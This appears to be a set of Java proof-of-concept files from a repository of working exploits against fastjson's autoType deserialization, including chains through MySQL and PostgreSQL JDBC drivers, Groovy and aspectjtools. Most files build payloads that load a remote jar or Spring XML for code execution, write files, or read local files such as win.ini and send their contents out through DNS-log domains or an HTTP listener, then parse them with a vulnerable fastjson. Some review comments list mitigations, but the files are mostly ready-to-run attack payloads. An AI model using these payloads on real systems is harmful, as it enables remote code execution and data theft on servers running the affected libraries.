--------------------------------------------------------------------------------
1 | package com.shiro.vuln.fastjson;
2 |
3 | import com.alibaba.fastjson.JSON;
4 |
/**
 * fastjson (<= 1.2.68) "AutoCloseable" autoType-bypass PoC against mysql-connector-java
 * 6.0.2-6.0.3: {@code com.mysql.cj.jdbc.ha.LoadBalancedMySQLConnection} is built from a JDBC URL
 * that carries {@code autoDeserialize=true}, the {@code ServerStatusDiffInterceptor} and the
 * gadget-selecting user name, so the parsing host connects to the attacker's MySQL server and
 * (per the original note) deserializes its reply. Lab use only.
 *
 * <p>NOTE(review): mitigation is disabling autoType (fastjson safeMode) or upgrading fastjson;
 * egress filtering from the parsing host also breaks this chain.
 */
public class Fastjson14_mysql_3 {
    // Affected: fastjson <= 1.2.68 with mysql-connector-java 6.0.2-6.0.3 -> deserialization.
    public static void main(String[] args) throws Exception{
        String payload = "{\r\n"
            + " \"@type\": \"java.lang.AutoCloseable\",\r\n"
            + " \"@type\": \"com.mysql.cj.jdbc.ha.LoadBalancedMySQLConnection\",\r\n"
            + " \"proxy\": {\r\n"
            + " \"connectionString\": {\r\n"
            + " \"url\": \"jdbc:mysql://127.0.0.1:3306/test?autoDeserialize=true&statementInterceptors=com.mysql.cj.jdbc.interceptors.ServerStatusDiffInterceptor&user=yso_CommonsCollections4_calc\"\r\n"
            + " }\r\n"
            + " }\r\n"
            + "}\r\n"
            + "";
        System.out.println(payload);
        // Exploit step: parse the hostile document with a vulnerable fastjson.
        JSON.parseObject(payload);
    }
}
22 |
--------------------------------------------------------------------------------
/src/main/java/com/shiro/vuln/fastjson/Fastjson15_mysql_4.java:
--------------------------------------------------------------------------------
1 | package com.shiro.vuln.fastjson;
2 |
3 | import com.alibaba.fastjson.JSON;
4 |
/**
 * fastjson (<= 1.2.68) "AutoCloseable" autoType-bypass PoC against mysql-connector-java 8.x:
 * {@code ReplicationMySQLConnection} -> {@code LoadBalancedConnectionProxy} ->
 * {@code ReplicationConnectionUrl} whose properties carry {@code autoDeserialize} and the
 * interceptor (note the 8.x property name is {@code queryInterceptors}, not
 * {@code statementInterceptors} as in the 5.x PoCs). Per the original note 8.0.19 deserializes
 * the server's reply and later versions give SSRF only. Lab use only.
 *
 * <p>NOTE(review): mitigation is disabling autoType (fastjson safeMode) or upgrading fastjson;
 * egress filtering from the parsing host also breaks this chain.
 */
public class Fastjson15_mysql_4 {
    // Affected: fastjson <= 1.2.68; mysql-connector-java 8.0.19 -> deserialization, > 8.0.19 -> SSRF only.
    public static void main(String[] args) throws Exception{
        String payload = "{\r\n"
            + " \"@type\": \"java.lang.AutoCloseable\",\r\n"
            + " \"@type\": \"com.mysql.cj.jdbc.ha.ReplicationMySQLConnection\",\r\n"
            + " \"proxy\": {\r\n"
            + " \"@type\": \"com.mysql.cj.jdbc.ha.LoadBalancedConnectionProxy\",\r\n"
            + " \"connectionUrl\": {\r\n"
            + " \"@type\": \"com.mysql.cj.conf.url.ReplicationConnectionUrl\",\r\n"
            + " \"masters\": [{\r\n"
            + " \"host\": \"\"\r\n"
            + " }],\r\n"
            + " \"slaves\": [],\r\n"
            + " \"properties\": {\r\n"
            + " \"host\": \"127.0.0.1\",\r\n"
            + " \"user\": \"yso_CommonsCollections4_calc\",\r\n"
            + " \"dbname\": \"dbname\",\r\n"
            + " \"password\": \"pass\",\r\n"
            + " \"queryInterceptors\": \"com.mysql.cj.jdbc.interceptors.ServerStatusDiffInterceptor\",\r\n"
            + " \"autoDeserialize\": \"true\"\r\n"
            + " }\r\n"
            + " }\r\n"
            + " }\r\n"
            + "}\r\n"
            + "";
        System.out.println(payload);
        // Exploit step: parse the hostile document with a vulnerable fastjson.
        JSON.parseObject(payload);
    }
}
35 |
--------------------------------------------------------------------------------
/src/main/java/com/shiro/vuln/fastjson/Fastjson16_pgsql.java:
--------------------------------------------------------------------------------
1 | package com.shiro.vuln.fastjson;
2 | import com.alibaba.fastjson.JSON;
3 |
/**
 * fastjson (<= 1.2.68) "AutoCloseable" autoType-bypass PoC against the PostgreSQL JDBC driver:
 * {@code org.postgresql.jdbc.PgConnection} is given an {@code info.socketFactory} class name and
 * a {@code socketFactoryArg}. With Spring's {@code ClassPathXmlApplicationContext} as the factory
 * and a URL as the argument, the parsing host fetches {@code test.xml} from the attacker's server
 * and presumably instantiates whatever beans it declares - i.e. code execution. The commented-out
 * variant uses {@code java.io.FileOutputStream} with a path instead, which creates or truncates
 * that file on the parsing host. Lab use only.
 *
 * <p>NOTE(review): mitigation is disabling autoType (fastjson safeMode) or upgrading fastjson;
 * blocking egress to the XML host also defeats the Spring variant but not the file one.
 */
public class Fastjson16_pgsql {
    public static void main(String[] args) throws Exception {

        // Affected: fastjson <= 1.2.68; needs postgresql-42.3.1 and a Spring environment. See the
        // references on the PgSQL JDBC attack surface for the socketFactory/socketFactoryArg behaviour.
        // The h2 jar was, surprisingly, not compiled with -g, so h2's JDBC driver is not considered here.
        String payload = "{\r\n"
            + " \"@type\": \"java.lang.AutoCloseable\",\r\n"
            + " \"@type\": \"org.postgresql.jdbc.PgConnection\",\r\n"
            + " \"hostSpecs\": [{\r\n"
            + " \"host\": \"127.0.0.1\",\r\n"
            + " \"port\": 2333\r\n"
            + " }],\r\n"
            + " \"user\": \"test\",\r\n"
            + " \"database\": \"test\",\r\n"
            + " \"info\": {\r\n"
            + " \"socketFactory\": \"org.springframework.context.support.ClassPathXmlApplicationContext\",\r\n"
            + " \"socketFactoryArg\": \"http://127.0.0.1:81/test.xml\"\r\n"
            + " },\r\n"
            + " \"url\": \"\"\r\n"
            + "}";
        // File-write variant (no Spring needed): the factory class is constructed with the path.
        // payload = "{\r\n"
        // + " \"@type\": \"java.lang.AutoCloseable\",\r\n"
        // + " \"@type\": \"org.postgresql.jdbc.PgConnection\",\r\n"
        // + " \"hostSpecs\": [{\r\n"
        // + " \"host\": \"127.0.0.1\",\r\n"
        // + " \"port\": 2333\r\n"
        // + " }],\r\n"
        // + " \"user\": \"test\",\r\n"
        // + " \"database\": \"test\",\r\n"
        // + " \"info\": {\r\n"
        // + " \"socketFactory\": \"java.io.FileOutputStream\",\r\n"
        // + " \"socketFactoryArg\": \"1.txt\"\r\n"
        // + " },\r\n"
        // + " \"url\": \"\"\r\n"
        // + "}";


        System.out.println(payload);
        // Exploit step: parse the hostile document with a vulnerable fastjson.
        JSON.parseObject(payload);
    }
}
45 |
--------------------------------------------------------------------------------
/src/main/java/com/shiro/vuln/fastjson/Fastjson17_groovy.java:
--------------------------------------------------------------------------------
1 | package com.shiro.vuln.fastjson;
2 | import com.alibaba.fastjson.JSON;
3 |
/**
 * fastjson 1.2.76-1.2.80 PoC using Groovy: a remote jar is put on a compiler configuration's
 * classpath so the parsing host loads attacker-supplied code. Lab use only.
 *
 * <p>poc1 is a priming step: it names {@code CompilationFailedException} behind the
 * {@code java.lang.Exception} expected type, which presumably gets the Groovy types past the
 * autoType check for the second document (that first parse is expected to throw and is ignored).
 * poc2 then builds a {@code JavaStubCompilationUnit} whose
 * {@code CompilerConfiguration.classpathList} points at {@code attack-1.jar} on the attacker's
 * HTTP server.
 *
 * <p>NOTE(review): mitigation is disabling autoType (fastjson safeMode) or upgrading fastjson;
 * blocking egress to the jar host also breaks this chain.
 */
public class Fastjson17_groovy {
    public static void main(String[] args){

        // Affected: fastjson 1.2.76-1.2.80 with groovy on the classpath.
        // For how to build the jar see https://github.com/Lonely-night/fastjsonVul/tree/7f9d2d8ea1c27ae1f9c06076849ae76c25b6aff7
        String poc1 = "{\n" +
            " \"@type\":\"java.lang.Exception\",\n" +
            " \"@type\":\"org.codehaus.groovy.control.CompilationFailedException\",\n" +
            " \"unit\":{}\n" +
            "}";
        String poc2 = "{\n" +
            " \"@type\":\"org.codehaus.groovy.control.ProcessingUnit\",\n" +
            " \"@type\":\"org.codehaus.groovy.tools.javac.JavaStubCompilationUnit\",\n" +
            " \"config\":{\n" +
            " \"@type\":\"org.codehaus.groovy.control.CompilerConfiguration\",\n" +
            " \"classpathList\":\"http://127.0.0.1:81/attack-1.jar\"\n" +
            " }\n" +
            "}";
        System.out.println(poc1);
        System.out.println(poc2);
        try {
            JSON.parseObject(poc1);
        } catch (Exception e) { /* expected: poc1 only primes the class; its failure is irrelevant */ }
        // Exploit step: this parse pulls the remote jar onto the classpath.
        JSON.parseObject(poc2);
    }
}
30 |
--------------------------------------------------------------------------------
/src/main/java/com/shiro/vuln/fastjson/Fastjson18_ajt_read_error_dnslog.java:
--------------------------------------------------------------------------------
1 | package com.shiro.vuln.fastjson;
2 | import com.alibaba.fastjson.JSON;
3 |
/**
 * fastjson 1.2.73-1.2.80 PoC using aspectjtools: {@code BasicCompilationUnit} is constructed
 * with an attacker-chosen {@code fileName}, which presumably reads that file eagerly so its
 * contents can be carried out of the parser. Three read-back channels are sketched below: the
 * printed parse result, the error message of a forced type mismatch ({@code java.lang.Character}
 * wrapper), and a DNS lookup triggered via {@code java.net.Inet4Address} with the file contents
 * folded into a {@code java.util.Locale} string. Lab use only.
 *
 * <p>poc1 and poc2 are priming steps (the {@code java.lang.Exception} /
 * {@code java.lang.Class} + {@code Locale} + {@code JSONObject} nesting) that presumably get the
 * aspectj class past the autoType check before poc3 uses it directly; poc2 is deliberately left
 * unterminated (no closing braces) and is expected to throw.
 *
 * <p>NOTE(review): only the first poc3 form is actually parsed; the two later assignments are
 * overwritten / never parsed because the final parse call is commented out. Mitigation is
 * disabling autoType (fastjson safeMode) or upgrading fastjson.
 */
public class Fastjson18_ajt_read_error_dnslog {
    public static void main(String[] args){

        // Affected: fastjson 1.2.73-1.2.80 with aspectjtools on the classpath.
        String poc1 = "{\n" +
            " \"@type\":\"java.lang.Exception\",\n" +
            " \"@type\":\"org.aspectj.org.eclipse.jdt.internal.compiler.lookup.SourceTypeCollisionException\"\n" +
            "}";
        String poc2 = "{\r\n"
            + " \"@type\": \"java.lang.Class\",\r\n"
            + " \"val\": {\r\n"
            + " \"@type\": \"java.lang.String\" {\r\n"
            + " \"@type\": \"java.util.Locale\",\r\n"
            + " \"val\": {\r\n"
            + " \"@type\": \"com.alibaba.fastjson.JSONObject\",\r\n"
            + " {\r\n"
            + " \"@type\": \"java.lang.String\"\r\n"
            + " \"@type\": \"org.aspectj.org.eclipse.jdt.internal.compiler.lookup.SourceTypeCollisionException\",\r\n"
            + " \"newAnnotationProcessorUnits\": [{}]\r\n"
            + " }\r\n"
            + " }\r\n"
            + "";





        // Read-back via the printed parse result.
        String poc3 = "{\n" +
            " \"x\":{\n" +
            " \"@type\":\"org.aspectj.org.eclipse.jdt.internal.compiler.env.ICompilationUnit\",\n" +
            " \"@type\":\"org.aspectj.org.eclipse.jdt.internal.core.BasicCompilationUnit\",\n" +
            " \"fileName\":\"C:/windows/win.ini\"\n" +
            " }\n" +
            "}";
        System.out.println(poc1);
        System.out.println(poc2);
        // NOTE(review): unlike the later PoCs this priming parse is not guarded; if it throws,
        // nothing below runs.
        JSON.parseObject(poc1);
        try {
            JSON.parseObject(poc2);
        } catch (Exception e){ /* expected: poc2 is intentionally unterminated */ }
        System.out.println(poc3);
        System.out.println(JSON.parseObject(poc3));

        // Read-back via the error message: the Character wrapper forces a type mismatch whose
        // exception text presumably includes the offending (file-content) value.
        poc3 = "{\r\n"
            + " \"@type\": \"java.lang.Character\" {\r\n"
            + " \"C\": {\r\n"
            + " \"x\": {\r\n"
            + " \"@type\": \"org.aspectj.org.eclipse.jdt.internal.compiler.env.ICompilationUnit\",\r\n"
            + " \"@type\": \"org.aspectj.org.eclipse.jdt.internal.core.BasicCompilationUnit\",\r\n"
            + " \"fileName\": \"C:/windows/win.ini\"\r\n"
            + " }\r\n"
            + " }\r\n"
            + " }\r\n"
            + "}";

        // Read-back via DNS log: because of the special characters in the resulting hostname this
        // apparently only works on macOS and with a specific DNS-log platform.
        poc3 = "{\r\n"
            + " \"@type\":\"java.net.Inet4Address\",\r\n"
            + " \"val\":{\r\n"
            + " \"@type\":\"java.lang.String\"{\r\n"
            + " \"@type\":\"java.util.Locale\",\r\n"
            + " \"val\":{\r\n"
            + " \"@type\":\"com.alibaba.fastjson.JSONObject\",{\r\n"
            + " \"@type\":\"java.lang.String\"\r\n"
            + " \"@type\":\"java.util.Locale\",\r\n"
            + " \"country\":\"97477dfe.logplog.eu.org\",\r\n"
            + " \"language\":{\r\n"
            + " \"@type\":\"java.lang.String\"{\r\n"
            + " \"x\":{\r\n"
            + " \"@type\": \"org.aspectj.org.eclipse.jdt.internal.compiler.env.ICompilationUnit\",\r\n"
            + " \"@type\": \"org.aspectj.org.eclipse.jdt.internal.core.BasicCompilationUnit\",\r\n"
            + " \"fileName\": \"C:/windows/win.ini\"\r\n"
            + " }\r\n"
            + " }\r\n"
            + " }\r\n"
            + " }\r\n"
            + " }\r\n"
            + " }\r\n"
            + "}\r\n"
            + "}\r\n"
            + "\r\n"
            + "\r\n"
            + "\r\n"
            + "";



        // Left disabled by the author: the DNS-log variant is not exercised by this main().
        //System.out.println(poc3);
        //JSON.parseObject(poc3);

    }
}
97 |
--------------------------------------------------------------------------------
/src/main/java/com/shiro/vuln/fastjson/Fastjson19_ajt_read_error_dnslog_2.java:
--------------------------------------------------------------------------------
1 | package com.shiro.vuln.fastjson;
2 |
3 | import com.alibaba.fastjson.JSON;
4 |
/**
 * fastjson 1.2.73-1.2.80 PoC using aspectjtools, a two-request version of the previous one: poc1
 * bundles the priming steps and a first {@code BasicCompilationUnit} into one JSON array, poc2
 * carries the actual file read ({@code fileName}) plus the read-back channel. Lab use only.
 *
 * <p>Two channels are present: the error-message form ({@code java.lang.Character} wrapper,
 * assigned first and then overwritten) and the DNS-log form that is actually parsed, where the
 * file contents are presumably folded into a {@code java.util.Locale} string (via the
 * {@code $ref} to {@code $}) that {@code java.net.Inet4Address} then tries to resolve under the
 * attacker's DNS-log domain. The original author reports the DNS variant working only on macOS.
 *
 * <p>NOTE(review): mitigation is disabling autoType (fastjson safeMode) or upgrading fastjson;
 * blocking outbound DNS from the parsing host removes the exfiltration channel only.
 */
public class Fastjson19_ajt_read_error_dnslog_2 {
    public static void main(String[] args){

        // Affected: fastjson 1.2.73-1.2.80 with aspectjtools. This only simplifies the PoC into two requests.
        String poc1 = "[{\r\n"
            + " \"@type\": \"java.lang.Exception\",\r\n"
            + " \"@type\": \"org.aspectj.org.eclipse.jdt.internal.compiler.lookup.SourceTypeCollisionException\"\r\n"
            + " },\r\n"
            + " {\r\n"
            + " \"@type\": \"java.lang.Class\",\r\n"
            + " \"val\": {\r\n"
            + " \"@type\": \"java.lang.String\" {\r\n"
            + " \"@type\": \"java.util.Locale\",\r\n"
            + " \"val\": {\r\n"
            + " \"@type\": \"com.alibaba.fastjson.JSONObject\",\r\n"
            + " {\r\n"
            + " \"@type\": \"java.lang.String\"\r\n"
            + " \"@type\": \"org.aspectj.org.eclipse.jdt.internal.compiler.lookup.SourceTypeCollisionException\",\r\n"
            + " \"newAnnotationProcessorUnits\": [{}]\r\n"
            + " }\r\n"
            + " }\r\n"
            + " },\r\n"
            + " {\r\n"
            + " \"x\": {\r\n"
            + " \"@type\": \"org.aspectj.org.eclipse.jdt.internal.compiler.env.ICompilationUnit\",\r\n"
            + " \"@type\": \"org.aspectj.org.eclipse.jdt.internal.core.BasicCompilationUnit\",\r\n"
            + " \"fileName\": \"aaa\"\r\n"
            + " }\r\n"
            + " }]";
        // Read-back via the error message (overwritten below, so never parsed here).
        String poc2 = "{\r\n"
            + "\"@type\":\"java.lang.Character\"{\"c\":{\r\n"
            + "\"@type\":\"org.aspectj.org.eclipse.jdt.internal.core.BasicCompilationUnit\",\r\n"
            + "\"fileName\":\"C:/Windows/win.ini\"}}";


        // Read-back via DNS log; apparently only works on macOS.
        poc2 = "{\r\n"
            + " \"a\": {\r\n"
            + " \"@type\": \"org.aspectj.org.eclipse.jdt.internal.core.BasicCompilationUnit\",\r\n"
            + " \"fileName\": \"C:/Windows/win.ini\"\r\n"
            + " },\r\n"
            + " \"b\": {\r\n"
            + " \"@type\": \"java.net.Inet4Address\",\r\n"
            + " \"val\": {\r\n"
            + " \"@type\": \"java.lang.String\" {\r\n"
            + " \"@type\": \"java.util.Locale\",\r\n"
            + " \"val\": {\r\n"
            + " \"@type\": \"com.alibaba.fastjson.JSONObject\",\r\n"
            + " {\r\n"
            + " \"@type\": \"java.lang.String\"\r\n"
            + " \"@type\": \"java.util.Locale\",\r\n"
            + " \"language\": {\r\n"
            + " \"@type\": \"java.lang.String\" {\r\n"
            + " \"$ref\": \"$\"\r\n"
            + " },\r\n"
            + " \"country\": \"17e92b3b.dns.1433.eu.org\"\r\n"
            + " }\r\n"
            + " }\r\n"
            + " }\r\n"
            + " ";



        System.out.println(poc1);
        System.out.println(poc2);
        try {
            JSON.parseObject(poc1);
        } catch (Exception e){ /* expected: poc1 only primes the aspectj class */ }
        // Exploit step: file read plus DNS exfiltration.
        JSON.parseObject(poc2);



    }
}
80 |
--------------------------------------------------------------------------------
/src/main/java/com/shiro/vuln/fastjson/Fastjson20_ajt_ognl_io_read_httplog.java:
--------------------------------------------------------------------------------
1 | package com.shiro.vuln.fastjson;
2 |
3 | import com.alibaba.fastjson.JSON;
4 |
/**
 * fastjson 1.2.73-1.2.80 PoC combining aspectjtools, OGNL and commons-io: the contents of
 * {@code fileName} are carried out to an HTTP listener. Lab use only.
 *
 * <p>poc1 is the aspectj priming array from the previous PoCs. In poc2, "su14"/"su15" prime
 * {@code ognl.OgnlException} the same way, and "su16" reaches a commons-io BOMInputStream through
 * {@code ognl.Evaluation -> ASTMethod -> OgnlParser.stream}. Its nashorn URLReader URL is a
 * {@code java.util.Locale} whose language is the listener URL and whose country is a
 * {@code BasicCompilationUnit} array over the target file - presumably the Locale's string form
 * concatenates both, so the request the parsing host makes to 127.0.0.1:5667 carries the file
 * contents in the query string. "su17"/"su18" reference the stream and its {@code bOM.bytes},
 * which is what forces the read to happen.
 *
 * <p>NOTE(review): mitigation is disabling autoType (fastjson safeMode) or upgrading fastjson;
 * egress filtering from the parsing host removes the exfiltration channel only.
 */
public class Fastjson20_ajt_ognl_io_read_httplog {
    public static void main(String[] args){

        // Affected: fastjson 1.2.73-1.2.80 with aspectjtools, ognl-3.2.21 and commons-io-2.2.
        String poc1 = "[{\r\n"
            + " \"@type\": \"java.lang.Exception\",\r\n"
            + " \"@type\": \"org.aspectj.org.eclipse.jdt.internal.compiler.lookup.SourceTypeCollisionException\"\r\n"
            + " },\r\n"
            + " {\r\n"
            + " \"@type\": \"java.lang.Class\",\r\n"
            + " \"val\": {\r\n"
            + " \"@type\": \"java.lang.String\" {\r\n"
            + " \"@type\": \"java.util.Locale\",\r\n"
            + " \"val\": {\r\n"
            + " \"@type\": \"com.alibaba.fastjson.JSONObject\",\r\n"
            + " {\r\n"
            + " \"@type\": \"java.lang.String\"\r\n"
            + " \"@type\": \"org.aspectj.org.eclipse.jdt.internal.compiler.lookup.SourceTypeCollisionException\",\r\n"
            + " \"newAnnotationProcessorUnits\": [{}]\r\n"
            + " }\r\n"
            + " }\r\n"
            + " },\r\n"
            + " {\r\n"
            + " \"x\": {\r\n"
            + " \"@type\": \"org.aspectj.org.eclipse.jdt.internal.compiler.env.ICompilationUnit\",\r\n"
            + " \"@type\": \"org.aspectj.org.eclipse.jdt.internal.core.BasicCompilationUnit\",\r\n"
            + " \"fileName\": \"aaa\"\r\n"
            + " }\r\n"
            + " }]";

        // Exfiltration over HTTP.
        String poc2 = "{\r\n"
            + " \"su14\": {\r\n"
            + " \"@type\": \"java.lang.Exception\",\r\n"
            + " \"@type\": \"ognl.OgnlException\"\r\n"
            + " },\r\n"
            + " \"su15\": {\r\n"
            + " \"@type\": \"java.lang.Class\",\r\n"
            + " \"val\": {\r\n"
            + " \"@type\": \"com.alibaba.fastjson.JSONObject\",\r\n"
            + " {\r\n"
            + " \"@type\": \"java.lang.String\"\r\n"
            + " \"@type\": \"ognl.OgnlException\",\r\n"
            + " \"_evaluation\": \"\"\r\n"
            + " }\r\n"
            + " },\r\n"
            + " \"su16\": {\r\n"
            + " \"@type\": \"ognl.Evaluation\",\r\n"
            + " \"node\": {\r\n"
            + " \"@type\": \"ognl.ASTMethod\",\r\n"
            + " \"p\": {\r\n"
            + " \"@type\": \"ognl.OgnlParser\",\r\n"
            + " \"stream\": {\r\n"
            + " \"@type\": \"org.apache.commons.io.input.BOMInputStream\",\r\n"
            + " \"delegate\": {\r\n"
            + " \"@type\": \"org.apache.commons.io.input.ReaderInputStream\",\r\n"
            + " \"reader\": {\r\n"
            + " \"@type\": \"jdk.nashorn.api.scripting.URLReader\",\r\n"
            + " \"url\": {\r\n"
            + " \"@type\": \"java.lang.String\" {\r\n"
            + " \"@type\": \"java.util.Locale\",\r\n"
            + " \"val\": {\r\n"
            + " \"@type\": \"com.alibaba.fastjson.JSONObject\",\r\n"
            + " {\r\n"
            + " \"@type\": \"java.lang.String\"\r\n"
            + " \"@type\": \"java.util.Locale\",\r\n"
            /* HTTP listener */ + " \"language\": \"http://127.0.0.1:5667/?test\",\r\n"
            + " \"country\": {\r\n"
            + " \"@type\": \"java.lang.String\" [{\r\n"
            + " \"@type\": \"org.aspectj.org.eclipse.jdt.internal.core.BasicCompilationUnit\",\r\n"
            /* file to exfiltrate */ + " \"fileName\": \"C:/Windows/win.ini\"\r\n"
            + " }]\r\n"
            + "\r\n"
            + " }\r\n"
            + " }\r\n"
            + " },\r\n"
            + " \"charsetName\": \"UTF-8\",\r\n"
            + " \"bufferSize\": 1024\r\n"
            + " },\r\n"
            + " \"boms\": [{\r\n"
            + " \"@type\": \"org.apache.commons.io.ByteOrderMark\",\r\n"
            + " \"charsetName\": \"UTF-8\",\r\n"
            + " \"bytes\": [\r\n"
            + " 36\r\n"
            + " ]\r\n"
            + " }]\r\n"
            + " }\r\n"
            + " }\r\n"
            + " }\r\n"
            + " },\r\n"
            + " \"su17\": {\r\n"
            + " \"$ref\": \"$.su16.node.p.stream\"\r\n"
            + " },\r\n"
            + " \"su18\": {\r\n"
            + " \"$ref\": \"$.su17.bOM.bytes\"\r\n"
            + " }\r\n"
            + " }";

        System.out.println(poc1);
        System.out.println(poc2);
        try {
            JSON.parseObject(poc1);
        } catch (Exception e){ /* expected: poc1 only primes the aspectj class */ }
        // Exploit step: file read plus HTTP exfiltration.
        JSON.parseObject(poc2);



    }
}
114 |
--------------------------------------------------------------------------------
/src/main/java/com/shiro/vuln/fastjson/Fastjson21_ajt_xalan_dom4j_io_read_httplog.java:
--------------------------------------------------------------------------------
1 | package com.shiro.vuln.fastjson;
2 |
3 | import com.alibaba.fastjson.JSON;
4 |
/**
 * fastjson 1.2.73-1.2.80 PoC combining aspectjtools, xalan, dom4j and commons-io: the contents of
 * {@code fileName} are carried out to an HTTP listener, using xalan/dom4j instead of OGNL to
 * reach a {@code java.io.InputStream} expected type. Lab use only.
 *
 * <p>poc1 is the aspectj priming array from the previous PoCs; poc2/poc3 prime xalan's
 * {@code DTMConfigurationException} the same way (poc2 is expected to throw). poc4 walks
 * {@code XNodeSetForDOM -> XPathContext.primaryReader -> dom4j XMLWriter.entityResolver ->
 * SAXContentHandler.inputSource.byteStream} and names {@code java.io.InputStream} there, which
 * presumably is what lets poc5 start with {@code "@type": "java.io.InputStream"} and drop into a
 * commons-io BOMInputStream. poc5's nashorn URLReader URL is a {@code java.util.Locale} whose
 * language is the listener URL and whose country is a {@code BasicCompilationUnit} over the
 * target file, so the request to 127.0.0.1:5667 presumably carries the file contents.
 *
 * <p>NOTE(review): mitigation is disabling autoType (fastjson safeMode) or upgrading fastjson;
 * egress filtering from the parsing host removes the exfiltration channel only.
 */
public class Fastjson21_ajt_xalan_dom4j_io_read_httplog {
    public static void main(String[] args){

        // Affected: fastjson 1.2.73-1.2.80 with aspectjtools, xalan-2.7.2, dom4j-2.1.3 and commons-io-2.2.
        String poc1 = "[{\r\n"
            + " \"@type\": \"java.lang.Exception\",\r\n"
            + " \"@type\": \"org.aspectj.org.eclipse.jdt.internal.compiler.lookup.SourceTypeCollisionException\"\r\n"
            + " },\r\n"
            + " {\r\n"
            + " \"@type\": \"java.lang.Class\",\r\n"
            + " \"val\": {\r\n"
            + " \"@type\": \"java.lang.String\" {\r\n"
            + " \"@type\": \"java.util.Locale\",\r\n"
            + " \"val\": {\r\n"
            + " \"@type\": \"com.alibaba.fastjson.JSONObject\",\r\n"
            + " {\r\n"
            + " \"@type\": \"java.lang.String\"\r\n"
            + " \"@type\": \"org.aspectj.org.eclipse.jdt.internal.compiler.lookup.SourceTypeCollisionException\",\r\n"
            + " \"newAnnotationProcessorUnits\": [{}]\r\n"
            + " }\r\n"
            + " }\r\n"
            + " },\r\n"
            + " {\r\n"
            + " \"x\": {\r\n"
            + " \"@type\": \"org.aspectj.org.eclipse.jdt.internal.compiler.env.ICompilationUnit\",\r\n"
            + " \"@type\": \"org.aspectj.org.eclipse.jdt.internal.core.BasicCompilationUnit\",\r\n"
            + " \"fileName\": \"aaa\"\r\n"
            + " }\r\n"
            + " }]";
        // Priming step for xalan's DTMConfigurationException (expected to throw).
        String poc2 = "{\r\n"
            + " \"@type\": \"java.lang.Exception\",\r\n"
            + " \"@type\": \"org.apache.xml.dtm.DTMConfigurationException\",\"locator\":{}\r\n"
            + "}";
        // Second priming step via java.lang.Class / Locale / JSONObject nesting.
        String poc3 = "{\r\n"
            + " \"@type\": \"java.lang.Class\",\r\n"
            + " \"val\": {\r\n"
            + " \"@type\": \"java.lang.String\" {\r\n"
            + " \"@type\": \"java.util.Locale\",\r\n"
            + " \"val\": {\r\n"
            + " \"@type\": \"com.alibaba.fastjson.JSONObject\",\r\n"
            + " {\r\n"
            + " \"@type\": \"java.lang.String\"\r\n"
            + " \"@type\": \"org.apache.xml.dtm.DTMConfigurationException\",\r\n"
            + " \"locator\": {}\r\n"
            + " }\r\n"
            + " }\r\n"
            + " }";
        // Reaches a java.io.InputStream-typed field through xalan and dom4j.
        String poc4 = "{\r\n"
            + " \"su14\": {\r\n"
            + " \"@type\": \"javax.xml.transform.SourceLocator\",\r\n"
            + " \"@type\": \"org.apache.xpath.objects.XNodeSetForDOM\",\r\n"
            + " \"nodeIter\": {\r\n"
            + " \"@type\": \"org.apache.xpath.NodeSet\"\r\n"
            + " },\r\n"
            + " \"xctxt\": {\r\n"
            + " \"@type\": \"org.apache.xpath.XPathContext\",\r\n"
            + " \"primaryReader\": {\r\n"
            + " \"@type\": \"org.dom4j.io.XMLWriter\",\r\n"
            + " \"entityResolver\": {\r\n"
            + " \"@type\": \"org.dom4j.io.SAXContentHandler\",\r\n"
            + " \"inputSource\": {\r\n"
            + " \"byteStream\": {\r\n"
            + " \"@type\": \"java.io.InputStream\"\r\n"
            + " }\r\n"
            + " }\r\n"
            + " }\r\n"
            + " }\r\n"
            + " }\r\n"
            + " }\r\n"
            + "}";
        // Exfiltration over HTTP: listener URL as Locale language, file contents as Locale country.
        String poc5 = "{\r\n"
            + " \"@type\": \"java.io.InputStream\",\r\n"
            + " \"@type\": \"org.apache.commons.io.input.BOMInputStream\",\r\n"
            + " \"delegate\": {\r\n"
            + " \"@type\": \"org.apache.commons.io.input.ReaderInputStream\",\r\n"
            + " \"reader\": {\r\n"
            + " \"@type\": \"jdk.nashorn.api.scripting.URLReader\",\r\n"
            + " \"url\": {\r\n"
            + " \"@type\": \"java.lang.String\" {\r\n"
            + " \"@type\": \"java.util.Locale\",\r\n"
            + " \"val\": {\r\n"
            + " \"@type\": \"com.alibaba.fastjson.JSONObject\",\r\n"
            + " {\r\n"
            + " \"@type\": \"java.lang.String\"\r\n"
            + " \"@type\": \"java.util.Locale\",\r\n"
            + " \"language\": \"http://127.0.0.1:5667/?test\",\r\n"
            + " \"country\": {\r\n"
            + " \"@type\": \"java.lang.String\" [{\r\n"
            + " \"@type\": \"org.aspectj.org.eclipse.jdt.internal.core.BasicCompilationUnit\",\r\n"
            + " \"fileName\": \"C:/Windows/win.ini\"\r\n"
            + " }]\r\n"
            + "\r\n"
            + " }\r\n"
            + " }\r\n"
            + " },\r\n"
            + " \"charsetName\": \"UTF-8\",\r\n"
            + " \"bufferSize\": 1024\r\n"
            + " },\r\n"
            + " \"boms\": [{\r\n"
            + " \"@type\": \"org.apache.commons.io.ByteOrderMark\",\r\n"
            + " \"charsetName\": \"UTF-8\",\r\n"
            + " \"bytes\": [\r\n"
            + " 36\r\n"
            + " ]\r\n"
            + " }]\r\n"
            + " }";

        System.out.println(poc1);
        System.out.println(poc2);
        try {
            JSON.parseObject(poc1);
        } catch (Exception e){ /* expected: poc1 only primes the aspectj class */ }
        try {
            JSON.parseObject(poc2);
        } catch (Exception e){ /* expected: poc2 only primes the xalan class */ }

        // NOTE(review): poc3/poc4/poc5 are parsed unguarded, so a failure in the priming steps
        // aborts main() with the exception instead of reporting which step broke.
        JSON.parseObject(poc3);
        JSON.parseObject(poc4);
        // Exploit step: file read plus HTTP exfiltration.
        JSON.parseObject(poc5);



    }
}
130 |
--------------------------------------------------------------------------------
/src/main/java/com/shiro/vuln/fastjson/Fastjson22_ognl_io_read_error_dnslog.java:
--------------------------------------------------------------------------------
1 | package com.shiro.vuln.fastjson;
2 | import java.io.IOException;
3 | import java.io.InputStream;
4 | import java.net.URL;
5 | import java.util.Arrays;
6 |
7 | import com.alibaba.fastjson.JSON;
8 |
9 | public class Fastjson22_ognl_io_read_error_dnslog {
10 | public static void main(String[] args) throws Exception, IOException{
11 |
12 | String url = "file:///D:/";
13 | InputStream input = new URL(url).openStream();
14 | byte[] bs = new byte[input.available()];
15 | input.read(bs);
16 | System.out.println(Arrays.toString(bs));
17 | System.out.println(new String(bs));
18 |
